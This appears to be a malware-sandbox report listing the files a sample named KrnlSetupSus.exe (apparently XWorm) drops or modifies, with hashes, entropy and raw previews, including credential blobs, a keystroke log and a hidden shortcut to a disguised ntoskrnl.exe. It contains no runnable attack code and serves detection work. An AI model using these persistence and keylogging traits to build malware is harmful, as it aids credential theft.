Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process:C:\Windows\System32\lsass.exe
File Type:data
Category:modified
Size (bytes):11136
Entropy (8bit):7.977735047841484
Encrypted:false
SSDEEP:192:SqzHGn8GpB3kqHOJwixL9LmSKa2rlMOr5ROdqyAyqs+49mcdGelsv8ZsdxE2Z7v:Sqzm8GpiCOJwid9qcKlMOr5RlyAS+49k
MD5:709904CF96EF7602A991D71596E3F4D4
SHA1:9B6075BEEA81F50A1DC9FA6A40311C534F61B9F3
SHA-256:F7305889D212C0F48719DA29AEBD40362388D07047A2A7C3AFB42BD932832C92
SHA-512:A5C901AE1A1BD6BA9EFFAE9C55A13AAB538CE186C6583AEDE62CFBF12AB43CEED6045A66AB4D6A222838718A1E9C5407F088EEB750B98C0497A5516C78B7645C
Malicious:false
Note (editor's reading, not sandbox output): "Local Credential Data" in the preview is the DPAPI blob description Windows uses for Credential Manager entries, so this is lsass.exe rewriting a credential store file (hence Category:modified and the near-8.0 entropy of an encrypted blob). Whether the sample triggered that write is not shown in this record.
Preview:....t+..................z..O.......$j/.j.C.h......... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ......jg.._q.=+|C.m..jD...+`...S>cw............ ...^.w).:...I..?...!..R`..&..4.e:p*..F>~.r......h%.x.l.....q.;...I"...../.(....e&.$|{..wM.b........,.bl1..:.r.....<..a. .........ioE.c..s..z.jz.hc...y..d.R..P.g...P....:..5..n 92...O..n-.q..k.<...a!z.q."..7..e.=s....1gP...........).....h.3..82 s.E^..%..,R.W...q.......h}.S.2..:L...Z...4N.\..........'o..v..?...@..........mz.j_.|w`.#..yM..*.....7..:.......-. .K.7.a..lrTa.s....wwWA.]..}......v.._........Y.....@}{..................z..&C...T..=$<v..H.../.[.s...q...9.(...}...L.dk)/N.MI.*x...`c{P....E....c}...oM.O^..G.U.z..S.:..4...M..~n*...04.......`...M..t.E....QJwv.t,O....g`C.z oC..,......%.* ......oO..guZ....%...}.H..G.%..%.w..}..={.oo7.....N..WZ..".<.....5.|.//...'......{W....;.y..H...Y~..G....a|.UX.X...<l....G.X.4:...:U.g.3p#...l.M;..O'.U.59O.O....e.0.....2.7Pr......7KM.....xX,i.a.."1..E..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1510207563435464
Encrypted:false
SSDEEP:3:NlllulPki/llllZ:NllUcylll
MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
Malicious:false
Preview:@...e.................................^..............@..........
Process:C:\ProgramData\KrnlSetupSus.exe
File Type:Generic INItialization configuration [WIN]
Category:modified
Size (bytes):58
Entropy (8bit):3.598349098128234
Encrypted:false
SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
MD5:5362ACB758D5B0134C33D457FCC002D9
SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
Malicious:false
Note (editor's reading, not sandbox output): the "INI" file type comes from the literal [WIN] token alone. The content, a "### explorer ###" window-title banner followed by the captured keys [WIN] r [WIN], is a keystroke log written by KrnlSetupSus.exe (the XWorm payload), apparently recording a Win+R press while explorer had focus. Its Malicious:false flag reflects the file's content, not the process that wrote it.
Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):468
                                                                                                                                Entropy (8bit):6.378346510928039
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:gLn57s5d65jpFzooLjLSyXI6Y1m9lYUgx4Sn:MC5d65j7zoqiyXI6Y1m9lYUgiS
                                                                                                                                MD5:F88F8714D1209774BAEA02F7882EBEFF
                                                                                                                                SHA1:DB2095D3FD5D313D1A314C7E34BFF34CAAD3B4F5
                                                                                                                                SHA-256:1A7D47116AEB8B943597ABDE27F70C14EAB3F6E4B07D1971E7E764C3B0F95175
                                                                                                                                SHA-512:8355AD9F97CE1733EBAC4FCC42BDA3BD2E756031BBCFEC6D5F2FC52DDE4E56B86DDD93BE846D1A210E9EC79746E9BB166D05199E5F9C65FA03F2D4A36EA2D8D5
                                                                                                                                Malicious:false
                                                                                                                                Preview:............2.f.6.a.2.4.f.9.-.6.a.d.9.-.4.3.e.4.-.b.f.6.8.-.f.c.c.f.d.b.1.a.a.8.8.0....................................................._..cN....@........f...}...Q.}X.<.mR...UAO.^.9.R.....D.(..?Q...z3..b.PIPy......E.4K........G....lC.K:...}..2..._.n.m.c!:..F.\I..a>...V...F.....9.Z$..A.I_...6f.......U.r..+..X..1.@........f....>..;......w4^...;s.F....&...G...].....?.....OV.....v..G.$..5.Z.4.,....[..n.z.........C..a/j...x$..........K... ..M._.....n
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24
                                                                                                                                Entropy (8bit):4.418295834054489
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:wy8O+Wwbn:w5Wwb
                                                                                                                                MD5:74ADEFF643805329350566353619BD26
                                                                                                                                SHA1:ECB5440BCDAB6EB93B434892B6903D1B2FB2BB1B
                                                                                                                                SHA-256:86ED647C4AA0BC6CEC1AA63D48C6198B7DF41B0E253ACE13B2FBBB88D30CFAF6
                                                                                                                                SHA-512:6CFBB3D200D623E861982AD32AFDAE64CCC985D07D9F9D0F53B894A38F6ECB5526FD5418D5514A645397215FDCD65E1578F0DF61201E9E58B3DD22A913341DC6
                                                                                                                                Malicious:false
                                                                                                                                Preview:.$j/.j.C.h...... .......
                                                                                                                                Process:C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 14 16:53:35 2024, mtime=Sat Dec 14 16:53:35 2024, atime=Sat Dec 14 16:53:35 2024, length=87040, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):670
                                                                                                                                Entropy (8bit):4.590831539421875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:8t0qppTsgcO8WRXlueXkNfTFjAY7NeD6bZdiE4hiE4fmV:8/lu1f1AseiZdEhEfm
                                                                                                                                MD5:BF08EF73994AC63AA6D165A27235C7DD
                                                                                                                                SHA1:532AD8716A98133A8EE2E32E010FC5187D8CEFF6
                                                                                                                                SHA-256:98C5B475A7203940731BA54A28FC3F5F9EAC838C908D6ADB51086CF89514A41E
                                                                                                                                SHA-512:2E0AFE0068B930457DDDADA04CE98044829E4E485F220187B31739188A3747EA1580777E38EFC3A243855B50E914B0872FB7C1D345B1041043E7FA252188A835
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F.... ..b8..QN..b8..QN..b8..QN...T...........................P.O. .:i.....+00.../C:\...................`.1......Y... PROGRA~3..H......O.I.Y......g.......................y.P.r.o.g.r.a.m.D.a.t.a.....f.2..T...Y.. ntoskrnl.exe..J......Y...Y.......)......................y.n.t.o.s.k.r.n.l...e.x.e.......J...............-.......I...........y..d.....C:\ProgramData\ntoskrnl.exe..3.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.n.t.o.s.k.r.n.l...e.x.e.`.......X.......098239...........hT..CrF.f4... .Q..LD....,...E...hT..CrF.f4... .Q..LD....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24
                                                                                                                                Entropy (8bit):4.584962500721156
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:LYULJpob:LYUkb
                                                                                                                                MD5:7C52D8173785B99E84F4B4208DE0BB10
                                                                                                                                SHA1:7657670549868E795CA46AA00B1AD544107777E1
                                                                                                                                SHA-256:60818BDD66DED9761220B0D939BE5CBFFCB7BC6F3702F58359F17A2D07822EF0
                                                                                                                                SHA-512:96E1807C8C78603669496A7BE4F663FDB0D454A3C04491429F30F987BD24209B2BD6578D36251E0109F93409E4A3DF639FC5F8F61FF5AE6109A57F0A8AC52C41
                                                                                                                                Malicious:false
                                                                                                                                Preview:.......O....MV.y......
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):468
                                                                                                                                Entropy (8bit):6.1562693653639995
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:Ell88GBCygACZiIuNIZH9QZ/GXpQTODdctx5J4F+hmNND0XkpGP3wTg82S:iOCyg5iDNE9QZ/bTORc75WQyNJpG4Tz
                                                                                                                                MD5:466FC12525FB2A988E0242E5B7A3B32A
                                                                                                                                SHA1:41FBC0A655D533F7E90BA27DF9F08CA984052F5E
                                                                                                                                SHA-256:AF19996F362636819FA19D41D772C80C70AAAC5CC35CE7D46A163B3B975BC877
                                                                                                                                SHA-512:DCB5A00FA55C4F7ED20B30E6224FBCAFE17E1FA941680FDF8FF3FC72391D32A1070448066398832419C0246ACA1833D160722830628FD5676880CC57195DF5DF
                                                                                                                                Malicious:false
                                                                                                                                Preview:............f.7.1.c.d.a.e.7.-.f.4.f.8.-.4.f.c.8.-.a.d.0.f.-.e.1.8.e.e.f.9.8.4.d.5.6..................................................9..9.,.w.b5{.A.@........f..i'Y6s.x.G.;8..a.h.MP..+...Ip5w..a..M...y...2?}<.B.;e..46..1B..M,....L[.R.c4..s....>....HP.\.w#..}.B.C... s..N...%.l...i>l,.+...........~......qt.../.....Mw@........f..2.D.T@$....v.U..Vb.R2..(.......N..6........O.c@.s..0...X.0D.;.t.I..K.la}....r4.u*&.....o.f.-..:...o..U.s......................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):4680
                                                                                                                                Entropy (8bit):3.711185470832321
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:pYMguQII4i66h4aGdinipV9ll7UY5HAmzQ+:9A4q/xne7HO+
                                                                                                                                MD5:F45658D91921C44DE566AF0E4B84EF37
                                                                                                                                SHA1:C33E293E8336D79A72DAEC550E7E3D8510023AED
                                                                                                                                SHA-256:1C4C57A98DE2676E6DAD97EAECFF796A3F4801215799972DDBF1ED83C952E3AF
                                                                                                                                SHA-512:E2210EC29CE7818A0F16DEF0BF614B49296BBE7C03E704B39AE18F9E1B20E9141A68A49E64D5F1C90D81F8EDE3D85648A6F0EA78A1F7F403F325573D392E24A5
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11136
                                                                                                                                Entropy (8bit):7.977985611122021
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:es+vgY7zhnuw+y0Cwnly0iR3C9fTBBVIJylTMJ6ttQfOaRFgIt0TB:ePvFz8w+y0CwnsrC9rBbI+MJ8udi
                                                                                                                                MD5:F0786EF5B77C61BE61EBAA63A9F6932D
                                                                                                                                SHA1:C61F6A785EF6C30B753227A6F996FFD3CA6E8861
                                                                                                                                SHA-256:BC5F7134C8B972E78F34CFE8EE874271D506B25C241D091A659F67D52AD39470
                                                                                                                                SHA-512:A889BAB6D667E2085EFF1A1EE3345AC0ADD3F170631B7E101031CEDD65D5B001898B76BF5691534D7F2B92F161061129A35C67D939FC2A24CC158FEEE8EDC74B
                                                                                                                                Malicious:false
                                                                                                                                Preview:....t+..................z..O.............O....MV... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ....^:.9._.%U..h{.U...R..9<...xZ$............. ....K72.a..[..]W,...w!..h.y9F.Y.V.5p*...h._.::......G...F......)d..........S.0.....%.......%.m...:...Y.`.3...ZDv(....+..!my.z.c.r.7.uk}...E.;.d.w.;.?.O..g....N...g(5..4...q.9.....n.....3..\.`......Z.s`.(..@}x.I5..RXJ..Y..&..&..+{...cJ}.y(6...!..I.....C.....A~.k..I9...}..+m".l./j......R.*..C-..N..4.d.......C.-...S%...C.:7..V.j..C.X.nA.....D.+|.K...{..;.t......"...Q.2.......i.R....1~..........[4.....X..A.!.O.g'..S.Bd....:}..r...1...o...n.j|...Aw.qR.....a>....\&q./.r.I\.Bk.E0.Pd...9XsL.l.../,/9~z......[.4..._w..$s.8......i.5}.(-........u)g..F...i.w...J...7......al.$...r..2..Y;v.....>.E.....S.^[.@..7Q.B..H...[...'O...E...}...../...},. ........."..._<..%.;..S...P...'....7..z.'Y.Cic.....ro...C.~....}..2..Q..-.......A..{..gPBpg..0&..s..w..Fu... .q..L.E...=.Q3..$.RC......h..;.....x..........
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e...........................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5048
                                                                                                                                Entropy (8bit):3.979141422721052
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MXUsfrP+yXCrPwfFRVEfWb3/Ooc0wzytxsIbYmFDSYKniOHE4sTCFDSGiZpQX1OW:lkCrup/vOoclke4FdKnDVGCFBiZsZ
                                                                                                                                MD5:5FB72844E09B58CF2460328376BFEE23
                                                                                                                                SHA1:78400E32B8CECFB903A32D98E0EF3B4DB93D6D34
                                                                                                                                SHA-256:60EA7A79E52BCB630571A7388FBF266A5F157125227739486E98F3C0021D95C0
                                                                                                                                SHA-512:B5B7E33B9F44F5A2953F1971BB8EFF6CC3C28A9CC35C3EC22CA87820902E4F86051828AE79E91E1836625724F8B149F90FB6C0AAD87D6A970FFE65C9B244FD94
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.................\.......^...................nOA>.....................................................................A.m............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j...................................~...................................&...............................................**..X...\.......<...QN.........3d.&........3d....P..k..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 310, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):112680
                                                                                                                                Entropy (8bit):3.7416863928223942
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:qVUHiapX7xadptrDT9W84H6gVUHiapX7xadptrDT9W84H6:lHi6xadptrX9WParHi6xadptrX9WPa
                                                                                                                                MD5:476AE061B56260CCD40FD4B07BD3896D
                                                                                                                                SHA1:7C5345ECF6A18402F2BC6BF66E0AB4891B8A3FFE
                                                                                                                                SHA-256:AE3F292E30105763ADD2729407159EB926CE7257ED19DE83527D09F0954A3FAA
                                                                                                                                SHA-512:4D9AC05ED151D0D8CB66158922582F86620D7D8F5C4E9EBFFE761112FFC85A78B17BE9A4CAD461C3148E3A689D5541E5A2BD9936D347CBD0C04DF93A960063FD
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.................6....................................................................................................I].ElfChnk.........7...............7....................v......................................................................g.u.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.377721629524822
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
                                                                                                                                MD5:B59AFB7FCA4C7067FBB3EF413064809B
                                                                                                                                SHA1:785A500AA8ADA1D59F3F7FD48E876F2305E7072D
                                                                                                                                SHA-256:ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
                                                                                                                                SHA-512:C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):96496
                                                                                                                                Entropy (8bit):4.272949127967265
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:vVHVRVaVwVvVQPlVbVPVzVXhMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoVbJ:cPx+HzPvi20Hl6MunW+HzPP
                                                                                                                                MD5:4E47A5C888549CFC2FAFD9DAC84582A3
                                                                                                                                SHA1:6579B4C03A36859EC5B8401E51AE28E77DBF2908
                                                                                                                                SHA-256:A9C8E8AE0D2123CB3BE8CED35F790B19F92F7E9DB12BD3A09AAA4E1932CE8348
                                                                                                                                SHA-512:7BC167C7E57DA39ED3E5CF2AF2EAF5C5B0F3F153F95DF492377162A968CAD48DCC52E7AC2147EB142B17B4EDCE20EC7E1FCF153422DFCC999565BEC4723FCBF6
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................h_..0a...O.i....................................................................%i.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=......**..............r...g..........Z..&...............................................................@.......X..._.!.....E..........@r...g...0.U.f...[2U.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....n.d.o....**...............7..g..........Z
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):67008
                                                                                                                                Entropy (8bit):4.182503448607405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:HmHm0hsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTmu:Q2klTiGFKX93WGUGpeOg26
                                                                                                                                MD5:7AAD757C916B34BF737D14C281E91B37
                                                                                                                                SHA1:6E6E1593E10B2AABC34C969342E3EA30F501A461
                                                                                                                                SHA-256:5886A0E49CFFB228FE132F2EAD64BC1217068A6BD52432279DA45A0B05E99881
                                                                                                                                SHA-512:88EC2AB170F24037F14BD8516DC811FF5A7186C5B2DD458C58CCBCD24EDB042C2C7E8EEEC1E8E0F395CFBEC010970FB44CB88F328AA505195CB80E3AD579A2F9
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.@-......o-......@-......o-..........(........1.......................................................................xA.................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v..........**......n-......h...PN.........Z..&...............................................................N.......d..._.!.....[..........@h...PN..0.U.f....2U.f...$.......n-...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c........-.....**......
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):70680
                                                                                                                                Entropy (8bit):0.7869971179220531
                                                                                                                                Encrypted:false
